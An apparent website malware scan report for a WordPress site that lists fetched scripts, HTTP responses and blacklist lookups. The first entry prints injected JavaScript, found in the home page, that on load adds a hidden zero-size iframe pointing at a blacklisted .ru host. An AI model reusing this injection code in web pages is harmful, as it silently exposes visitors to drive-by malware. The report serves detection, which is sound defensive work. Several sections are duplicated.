Scanned pages/files
Request | Server response | Status |
http://javinchiusc.com/ | 200 OK Content-Length: 10091 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru ...[309 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function an5c5ez(){ create_frame("http://rabiorik.ru/jqonodv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', an5c5ez); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); an5c5ez(); }; window.onload = newonload; } else { window.onload = an5c5ez; } } } catch(err) {} Decoded script: function an5c5ez() { create_frame("http://rabiorik.ru/jqonodv.cgi?default"); } | ||
http://javinchiusc.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/js/prettyPhoto/js/jquery.prettyPhoto.js | 200 OK Content-Length: 23508 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/js/jquery.quicksand.js | 200 OK Content-Length: 14697 Content-Type: application/javascript | clean |
http://maps.googleapis.com/maps/api/js?sensor=true | 200 OK Content-Length: 4901 Content-Type: text/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/js/jquery.validate.min.js | 200 OK Content-Length: 25361 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/js/jquery.history.js | 200 OK Content-Length: 6467 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/main.js | 200 OK Content-Length: 34864 Content-Type: application/javascript | clean |
http://javinchiusc.com/wp-content/themes/ThisWay/js/froogaloop.js | 200 OK Content-Length: 8561 Content-Type: application/javascript | clean |
http://javinchiusc.com/test404page.js | 404 Not Found Content-Length: 408 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: javinchiusc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 08:42:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://javinchiusc.com/xmlrpc.php
GET / HTTP/1.1
Host: javinchiusc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 08:42:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://javinchiusc.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: javinchiusc.com
Referer: http://www.google.com/search?q=javinchiusc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: javinchiusc.com
Referer: http://www.google.com/search?q=javinchiusc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=javinchiusc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://javinchiusc.com/
Result: javinchiusc.com is not infected or malware details are not published yet.
Result: javinchiusc.com is not infected or malware details are not published yet.